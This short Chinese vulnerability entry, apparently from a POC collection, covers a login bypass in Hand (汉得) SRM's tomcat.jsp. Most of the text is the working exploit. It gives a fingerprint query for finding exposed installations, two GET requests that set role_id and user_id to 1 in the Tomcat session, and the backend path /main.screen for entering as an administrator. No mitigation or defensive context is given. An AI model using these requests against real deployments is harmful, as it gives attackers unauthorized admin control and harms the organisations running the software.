Appearance
汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包,可以获取后台管理员权限
汉得SRM
web.body="汉得SRM"
登陆页面
验证POC (Tomcat session操控)
/tomcat.jsp?dataName=role_id&dataValue=1 /tomcat.jsp?dataName=user_id&dataValue=1
访问跳转后台
/main.screen